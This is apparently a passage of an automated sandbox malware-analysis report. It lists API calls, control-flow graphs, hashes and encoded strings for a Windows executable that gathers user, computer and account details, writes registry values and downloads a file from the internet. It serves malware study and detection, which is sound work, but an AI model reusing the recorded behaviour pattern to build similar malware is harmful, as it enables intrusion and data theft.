                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 00CBFC02
                                                                                                • GetComputerNameExW.KERNEL32(00000002,?,00000104,?,?), ref: 00CBFC5C
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CBFD67
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 00CB2DD9
                                                                                                  • Part of subcall function 00CB2B70: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB2E07
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.ADVAPI32(80000001), ref: 00CB2E10
                                                                                                  • Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404
                                                                                                  • Part of subcall function 00CB2B70: GetUserNameA.ADVAPI32(?,?), ref: 00CB2F01
                                                                                                  • Part of subcall function 00CB2B70: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB2F38
                                                                                                  • Part of subcall function 00CB2B70: GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB2F45
                                                                                                  • Part of subcall function 00CB2B70: GetSidSubAuthorityCount.ADVAPI32(?), ref: 00CB3041
                                                                                                  • Part of subcall function 00CB2B70: GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CB3080
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$AuthorityUser$CloseOpenValueVersion$AccountAdminComputerConcurrency::cancel_current_taskCountFileIdentifierLookupModuleQuery
                                                                                                • String ID: 0MGb$853321935212$937693$BoU7MQ==$ycHwNQ==$ycZCNQ==$ycZqNQ==$ycn5NQ==$ycv5NQ==$ycvBNQ==$yczsNQ==$ydDnNQ==$ydLxNQ==$ydPCNQ==$ydrmNQ==
                                                                                                • API String ID: 3585080883-3681084012
                                                                                                • Opcode ID: 905ed34d9f48956a9360a425efb3a034530762ec63d55a53140e75d8cb3e6001
                                                                                                • Instruction ID: 11d7318410058e88507a8353607f23124a0e568fa0a88c2abcb10de062691f1e
                                                                                                • Opcode Fuzzy Hash: 905ed34d9f48956a9360a425efb3a034530762ec63d55a53140e75d8cb3e6001
                                                                                                • Instruction Fuzzy Hash: AFB2D471A101549BEB2CDB38CC89B9DB636AB82304F2482DCE449A73D6DB359FC58F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CBB497
                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 00CBB5B9
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CBB6C2
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CBBCB9
                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00CBBE6E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesDirectory$CreateCurrentModuleName
                                                                                                • String ID: 853321935212$937693$Mq==$OJq=$Otu=$invalid stoi argument$stoi argument out of range$x9qpHisr4L0l$xsOpGA==$y9OjPX9iirE=
                                                                                                • API String ID: 1106825656-4130812631
                                                                                                • Opcode ID: 03284607f950b22dc79fca78b1aaeb02703eae01c80418975feb2bc88e1f93ee
                                                                                                • Instruction ID: e60b76a1bba92720ee73a26bb72487b5a7a4fe8f3563380484ea4f27c7bd8760
                                                                                                • Opcode Fuzzy Hash: 03284607f950b22dc79fca78b1aaeb02703eae01c80418975feb2bc88e1f93ee
                                                                                                • Instruction Fuzzy Hash: 57B20371A001049BEF18DB28CD85BDDBB72AF86304F14825CE4199B2D6DB76DEC58B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2367 cb2b70-cb2bc6 call cb2970 call cb29f0 call cb27e0 2374 cb2bc8-cb2bd5 2367->2374 2375 cb2bf5-cb2c11 2367->2375 2376 cb2beb-cb2bf2 call cc2870 2374->2376 2377 cb2bd7-cb2be5 2374->2377 2378 cb2c3c-cb2c42 2375->2378 2379 cb2c13-cb2c20 2375->2379 2376->2375 2377->2376 2382 cb2c73 call cc6fe4 2377->2382 2380 cb2c6c-cb2c72 2378->2380 2381 cb2c44-cb2c50 2378->2381 2384 cb2c32-cb2c39 call cc2870 2379->2384 2385 cb2c22-cb2c30 2379->2385 2387 cb2c62-cb2c69 call cc2870 2381->2387 2388 cb2c52-cb2c60 2381->2388 2392 cb2c78-cb2cc9 call cc6fe4 call cc35b0 RegOpenKeyExA 2382->2392 2384->2378 2385->2382 2385->2384 2387->2380 2388->2387 2388->2392 2400 cb2ccb-cb2ce9 RegQueryValueExA 2392->2400 2401 cb2cef-cb2d0f RegCloseKey 2392->2401 2400->2401 2402 cb2d12-cb2d17 2401->2402 2402->2402 2403 cb2d19-cb2d30 call cc16c0 2402->2403 2406 cb2d5a-cb2d72 2403->2406 2407 cb2d32-cb2d3e 2403->2407 2410 cb2d9c-cb2da3 2406->2410 2411 cb2d74-cb2d80 2406->2411 2408 cb2d50-cb2d57 call cc2870 2407->2408 2409 cb2d40-cb2d4e 2407->2409 2408->2406 2409->2408 2412 cb2da4-cb2de1 call cc6fe4 RegOpenKeyExA 2409->2412 2414 cb2d92-cb2d99 call cc2870 2411->2414 2415 cb2d82-cb2d90 2411->2415 2422 cb2e0d-cb2e1c RegCloseKey 2412->2422 2423 cb2de3-cb2e07 RegSetValueExA 2412->2423 2414->2410 2415->2412 2415->2414 2424 cb2e4a-cb2e62 2422->2424 2425 cb2e1e-cb2e2a 2422->2425 2423->2422 2428 cb2e8c-cb2ea4 2424->2428 2429 cb2e64-cb2e70 2424->2429 2426 cb2e2c-cb2e3a 2425->2426 2427 cb2e40-cb2e47 call cc2870 2425->2427 2426->2427 2434 cb2ed2-cb2f44 call cc6fe4 GetUserNameA LookupAccountNameA 2426->2434 2427->2424 2432 cb2ece-cb2ed1 2428->2432 2433 cb2ea6-cb2eb2 2428->2433 2430 cb2e82-cb2e89 call cc2870 2429->2430 2431 cb2e72-cb2e80 2429->2431 2430->2428 2431->2430 2431->2434 2437 cb2ec4-cb2ecb call cc2870 2433->2437 2438 cb2eb4-cb2ec2 2433->2438 2446 cb2f4b-cb2f6b call cc1350 call cb2b70 2434->2446 2437->2432 2438->2434 2438->2437 2451 cb2f6f-cb2f8a call cb2120 2446->2451 2452 cb2f6d 2446->2452 2455 cb2fb8-cb2fbe 2451->2455 2456 cb2f8c-cb2f98 2451->2456 2452->2451 2459 cb2fc1-cb2fc6 2455->2459 2457 cb2f9a-cb2fa8 2456->2457 2458 cb2fae-cb2fb5 call cc2870 2456->2458 2457->2458 2461 cb317e call cc6fe4 2457->2461 2458->2455 2459->2459 2460 cb2fc8-cb2fe8 call cc1350 call cb2b70 2459->2460 2473 cb2fea 2460->2473 2474 cb2fec-cb300c call cb2120 2460->2474 2467 cb3183 call cc6fe4 2461->2467 2471 cb3188-cb318f call cc6fe4 2467->2471 2473->2474 2478 cb303a-cb304e GetSidSubAuthorityCount 2474->2478 2479 cb300e-cb301a 2474->2479 2482 cb30dd-cb30f4 2478->2482 2483 cb3054-cb3074 call cc1350 call cb2b70 2478->2483 2480 cb301c-cb302a 2479->2480 2481 cb3030-cb3037 call cc2870 2479->2481 2480->2467 2480->2481 2481->2478 2486 cb30f8-cb30fd 2482->2486 2495 cb3078-cb30a6 GetSidSubAuthority call cb2120 2483->2495 2496 cb3076 2483->2496 2486->2486 2487 cb30ff-cb314b call cc16c0 * 2 2486->2487 2499 cb314d-cb3159 2487->2499 2500 cb3175-cb317d 2487->2500 2504 cb30a8-cb30b4 2495->2504 2505 cb30d4-cb30d7 2495->2505 2496->2495 2502 cb316b-cb3172 call cc2870 2499->2502 2503 cb315b-cb3169 2499->2503 2502->2500 2503->2471 2503->2502 2507 cb30ca-cb30d1 call cc2870 2504->2507 2508 cb30b6-cb30c4 2504->2508 2505->2482 2505->2483 2507->2505 2508->2461 2508->2507
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                • RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 00CB2DD9
                                                                                                • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB2E07
                                                                                                • RegCloseKey.ADVAPI32(80000001), ref: 00CB2E10
                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00CB2F01
                                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB2F38
                                                                                                • GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB2F45
                                                                                                  • Part of subcall function 00CB2B70: GetSidSubAuthorityCount.ADVAPI32(?), ref: 00CB3041
                                                                                                  • Part of subcall function 00CB2B70: GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CB3080
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Authority$CloseNameOpenValue$AccountCountIdentifierLookupQueryUser
                                                                                                • String ID: ;&v$AILvbQ==$JoQo HLm$yIRvbQ==
                                                                                                • API String ID: 3947990373-1666481835
                                                                                                • Opcode ID: 2c444e33287e87f2ac7ac3ff06b30b56a67f1e04077473a11caed9bd0c53dc26
                                                                                                • Instruction ID: e6145dbcc6cf6bd7faa6098a6fbaaab40bd1f2f7212fb05bb10d61c860a83900
                                                                                                • Opcode Fuzzy Hash: 2c444e33287e87f2ac7ac3ff06b30b56a67f1e04077473a11caed9bd0c53dc26
                                                                                                • Instruction Fuzzy Hash: 39022371600108ABEB18DF68CC85BEE7B79EF85304F10825DF85597292DB35DB85CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2512 cbaf20-cbaf2e 2513 cbaf30-cbafa2 call cc1350 call cb2b70 call cc2070 2512->2513 2520 cbafc9-cbafd3 2513->2520 2521 cbafa4-cbafc7 call cc4380 2513->2521 2522 cbafd9-cbb041 call cc1350 call cb2b70 call cc1800 call cc18f0 2520->2522 2523 cbafd4 call cc1d80 2520->2523 2521->2522 2534 cbb06f-cbb087 2522->2534 2535 cbb043-cbb04f 2522->2535 2523->2522 2538 cbb089-cbb095 2534->2538 2539 cbb0b5-cbb0cd 2534->2539 2536 cbb051-cbb05f 2535->2536 2537 cbb065-cbb06c call cc2870 2535->2537 2536->2537 2540 cbb430-cbb435 call cc6fe4 2536->2540 2537->2534 2542 cbb0ab-cbb0b2 call cc2870 2538->2542 2543 cbb097-cbb0a5 2538->2543 2544 cbb0fb-cbb113 2539->2544 2545 cbb0cf-cbb0db 2539->2545 2542->2539 2543->2540 2543->2542 2547 cbb141-cbb15c 2544->2547 2548 cbb115-cbb121 2544->2548 2551 cbb0dd-cbb0eb 2545->2551 2552 cbb0f1-cbb0f8 call cc2870 2545->2552 2556 cbb15e-cbb16d 2547->2556 2557 cbb18d-cbb1bd call cc1350 * 3 call cb73d0 2547->2557 2554 cbb123-cbb131 2548->2554 2555 cbb137-cbb13e call cc2870 2548->2555 2551->2540 2551->2552 2552->2544 2554->2540 2554->2555 2555->2547 2561 cbb16f-cbb17d 2556->2561 2562 cbb183-cbb18a call cc2870 2556->2562 2574 cbb1c2-cbb1f2 call cc1350 call cb2b70 call cc1350 call cb4010 2557->2574 2561->2540 2561->2562 2562->2557 2583 cbb27a-cbb2b4 2574->2583 2584 cbb1f8-cbb209 Sleep 2574->2584 2590 cbb2b6-cbb2c5 2583->2590 2591 cbb2e5-cbb2eb 2583->2591 2586 cbb20b-cbb217 2584->2586 2587 cbb237-cbb23d 2584->2587 2592 cbb219-cbb227 2586->2592 2593 cbb22d-cbb234 call cc2870 2586->2593 2588 cbb23f-cbb24e 2587->2588 2589 cbb26e-cbb272 2587->2589 2597 cbb250-cbb25e 2588->2597 2598 cbb264-cbb26b call cc2870 2588->2598 2589->2513 2599 cbb278 2589->2599 2600 cbb2db-cbb2e2 call cc2870 2590->2600 2601 cbb2c7-cbb2d5 2590->2601 2595 cbb319-cbb331 2591->2595 2596 cbb2ed-cbb2f9 2591->2596 2592->2540 2592->2593 2593->2587 2606 cbb35f-cbb377 2595->2606 2607 cbb333-cbb33f 2595->2607 2603 cbb2fb-cbb309 2596->2603 2604 cbb30f-cbb316 call cc2870 2596->2604 2597->2540 2597->2598 2598->2589 2599->2591 2600->2591 2601->2540 2601->2600 2603->2540 2603->2604 2604->2595 2614 cbb379-cbb385 2606->2614 2615 cbb3a5-cbb3bd 2606->2615 2612 cbb341-cbb34f 2607->2612 2613 cbb355-cbb35c call cc2870 2607->2613 2612->2540 2612->2613 2613->2606 2620 cbb39b-cbb3a2 call cc2870 2614->2620 2621 cbb387-cbb395 2614->2621 2616 cbb3bf-cbb3cb 2615->2616 2617 cbb3e7-cbb3ff 2615->2617 2623 cbb3dd-cbb3e4 call cc2870 2616->2623 2624 cbb3cd-cbb3db 2616->2624 2625 cbb429-cbb42f 2617->2625 2626 cbb401-cbb40d 2617->2626 2620->2615 2621->2540 2621->2620 2623->2617 2624->2540 2624->2623 2630 cbb41f-cbb426 call cc2870 2626->2630 2631 cbb40f-cbb41d 2626->2631 2630->2625 2631->2540 2631->2630
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 853321935212$937693$EG==$EwC+$Mq==$OJq=$invalid stoi argument$stoi argument out of range$ydLx9XH2
                                                                                                • API String ID: 0-4220198402
                                                                                                • Opcode ID: 547755187e1437d94e8c161b6806781af0a77a9c83747b1ec7fa915211a51be9
                                                                                                • Instruction ID: bff196ce24c26766bb098f8cb21f956df61ccde6e6def790059142d75de86ada
                                                                                                • Opcode Fuzzy Hash: 547755187e1437d94e8c161b6806781af0a77a9c83747b1ec7fa915211a51be9
                                                                                                • Instruction Fuzzy Hash: 54322370A002489BEF14EFA4C889BDE7B76EF41304F544158FC1557293DBB59A898BD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2635 cc2431-cc2452 InitializeCriticalSectionAndSpinCount GetModuleHandleW 2636 cc2454-cc2463 GetModuleHandleW 2635->2636 2637 cc2465-cc2481 GetProcAddress * 2 2635->2637 2636->2637 2638 cc24ab-cc24c5 call cc2b00 DeleteCriticalSection 2636->2638 2639 cc2495-cc24a9 CreateEventW 2637->2639 2640 cc2483-cc2485 2637->2640 2646 cc24ce 2638->2646 2647 cc24c7-cc24c8 CloseHandle 2638->2647 2639->2638 2642 cc2492-cc2494 2639->2642 2640->2639 2641 cc2487-cc248d 2640->2641 2641->2642 2647->2646
                                                                                                APIs
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00CE4738,00000FA0,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC243D
                                                                                                • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC2448
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC2459
                                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CC246B
                                                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CC2479
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC249C
                                                                                                • ___scrt_fastfail.LIBCMT ref: 00CC24AD
                                                                                                • DeleteCriticalSection.KERNEL32(00CE4738,00000007,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC24B8
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC24C8
                                                                                                Strings
                                                                                                • WakeAllConditionVariable, xrefs: 00CC2471
                                                                                                • kernel32.dll, xrefs: 00CC2454
                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CC2443
                                                                                                • SleepConditionVariableCS, xrefs: 00CC2465
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                • API String ID: 3578986977-3242537097
                                                                                                • Opcode ID: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
                                                                                                • Instruction ID: 3ae962a23ef8da906a439594d5df81c74f5a7ac162bba0cf1d5cb3418f1c84f3
                                                                                                • Opcode Fuzzy Hash: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
                                                                                                • Instruction Fuzzy Hash: D701DF71A42711ABC728AF75FD0EF2E37E9EB85B50B05002AF911D6250EB74C940CAB2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00CB6D26
                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00CB70B6
                                                                                                • InternetOpenA.WININET(00CDFE4B,00000000,00000000,00000000,00000000), ref: 00CB70CC
                                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00CB70EC
                                                                                                • InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB70FD
                                                                                                • WriteFile.KERNELBASE(?,00000000,00004000,?,00000000), ref: 00CB7122
                                                                                                • InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB712D
                                                                                                • CloseHandle.KERNEL32(?), ref: 00CB713F
                                                                                                • InternetCloseHandle.WININET(?), ref: 00CB714E
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CB7151
                                                                                                • RemoveDirectoryA.KERNEL32(?,?,00000000,?,?), ref: 00CB7303
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$File$CloseHandle$DirectoryOpenRead$CreateCurrentRemoveWrite
                                                                                                • String ID: y9OjPX9iirE=
                                                                                                • API String ID: 1504308605-26983213
                                                                                                • Opcode ID: bff7dad56d38a3e3b3879fb2f2aec99bf342c37176dadca01b84a7d5e3561b8d
                                                                                                • Instruction ID: c04d9ac9eb4889b1a29bf68c471ea16a59761276180eed9e08c34cb49d1f58a4
                                                                                                • Opcode Fuzzy Hash: bff7dad56d38a3e3b3879fb2f2aec99bf342c37176dadca01b84a7d5e3561b8d
                                                                                                • Instruction Fuzzy Hash: 7C02F271A00108ABEF18DB78DC85FEDBB76AF85304F24421CF855A72D6DB35DA818B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2691 cbd730-cbd780 call cc1350 call cb2b70 2696 cbd782 2691->2696 2697 cbd784-cbd7bc call cc1ca0 2691->2697 2696->2697 2700 cbd7c2-cbd7f5 call cc16c0 call cc11b0 2697->2700 2701 cbe246 call cc17f0 2697->2701 2710 cbd823-cbd829 2700->2710 2711 cbd7f7-cbd803 2700->2711 2705 cbe24b call cc6fe4 2701->2705 2709 cbe250 call cc6fe4 2705->2709 2715 cbe255-cbe25a call cc23aa 2709->2715 2716 cbd82b-cbd837 2710->2716 2717 cbd857-cbd877 call cc1350 call cb2b70 2710->2717 2713 cbd819-cbd820 call cc2870 2711->2713 2714 cbd805-cbd813 2711->2714 2713->2710 2714->2705 2714->2713 2723 cbe25f call cc6fe4 2715->2723 2720 cbd839-cbd847 2716->2720 2721 cbd84d-cbd854 call cc2870 2716->2721 2733 cbd87b-cbd8d6 call cc1ca0 call cc16c0 call cc11b0 2717->2733 2734 cbd879 2717->2734 2720->2705 2720->2721 2721->2717 2730 cbe278-cbe27d call cc23aa 2723->2730 2736 cbe282 call cc6fe4 2730->2736 2747 cbd8d8-cbd8e4 2733->2747 2748 cbd904-cbd90a 2733->2748 2734->2733 2740 cbe287-cbe28c call cc23ea 2736->2740 2744 cbe291-cbe296 call cc6fe4 2740->2744 2750 cbd8fa-cbd901 call cc2870 2747->2750 2751 cbd8e6-cbd8f4 2747->2751 2752 cbd938-cbd962 call cc5900 call cc6dc0 2748->2752 2753 cbd90c-cbd918 2748->2753 2750->2748 2751->2709 2751->2750 2752->2715 2764 cbd968-cbd96b 2752->2764 2756 cbd91a-cbd928 2753->2756 2757 cbd92e-cbd935 call cc2870 2753->2757 2756->2709 2756->2757 2757->2752 2764->2740 2765 cbd971-cbd974 2764->2765 2766 cbd97a 2765->2766 2767 cbdbc2-cbdbfe call cc1350 * 2 call cb78f0 call cc4c7c 2765->2767 2768 cbda03-cbda5e call cc1350 * 3 GetTempPathA 2766->2768 2769 cbdb43-cbdb94 call cc1350 * 3 call cb5040 call cbb440 call cc11b0 2766->2769 2770 cbd981-cbd9d2 call cc1350 * 3 call cb4f40 call cbb440 call cc11b0 2766->2770 2771 cbdac4-cbdb15 call cc1350 * 3 call cb5140 call cbb440 call cc11b0 2766->2771 2812 cbdf2e-cbdf38 2767->2812 2813 cbdc04-cbdc46 call cc4d0a call cc1350 call cc587c 2767->2813 2803 cbda61-cbda66 2768->2803 2769->2767 2841 cbdb96-cbdba2 2769->2841 2770->2767 2840 cbd9d8-cbd9e4 2770->2840 2771->2767 2842 cbdb1b-cbdb27 2771->2842 2803->2803 2808 cbda68-cbda7c call cc16c0 call cbb440 2803->2808 2833 cbda81-cbda93 call cc11b0 2808->2833 2819 cbdf3d-cbdf84 call cc1350 call cb2b70 call cc1350 * 4 call cbaf20 2812->2819 2856 cbdc48-cbdc54 2813->2856 2857 cbdc74-cbdcb9 call cc5900 call cc6dc0 2813->2857 2882 cbdf87-cbdf8d 2819->2882 2833->2767 2852 cbda99-cbdaa5 2833->2852 2846 cbd9ea-cbd9f8 2840->2846 2847 cbdbb8-cbdbbf call cc2870 2840->2847 2841->2847 2848 cbdba4-cbdbb2 2841->2848 2842->2847 2849 cbdb2d-cbdb41 2842->2849 2846->2723 2853 cbd9fe 2846->2853 2847->2767 2848->2847 2849->2847 2852->2847 2860 cbdaab-cbdabf 2852->2860 2853->2847 2862 cbdc6a-cbdc71 call cc2870 2856->2862 2863 cbdc56-cbdc64 2856->2863 2857->2730 2873 cbdcbf-cbdcc2 2857->2873 2860->2847 2862->2857 2863->2862 2873->2740 2875 cbdcc8-cbdcca 2873->2875 2875->2812 2877 cbdcd0-cbdd00 call cc1350 * 2 call cb3ac0 2875->2877 2906 cbdf27-cbdf2c 2877->2906 2907 cbdd06-cbdd4d call cc1350 call cb2b70 call cc1350 * 4 call cbaf20 2877->2907 2884 cbdfbb-cbdfc1 2882->2884 2885 cbdf8f-cbdf9b 2882->2885 2886 cbdfef-cbe007 2884->2886 2887 cbdfc3-cbdfcf 2884->2887 2889 cbdf9d-cbdfab 2885->2889 2890 cbdfb1-cbdfb8 call cc2870 2885->2890 2894 cbe009-cbe015 2886->2894 2895 cbe035-cbe04d 2886->2895 2892 cbdfd1-cbdfdf 2887->2892 2893 cbdfe5-cbdfec call 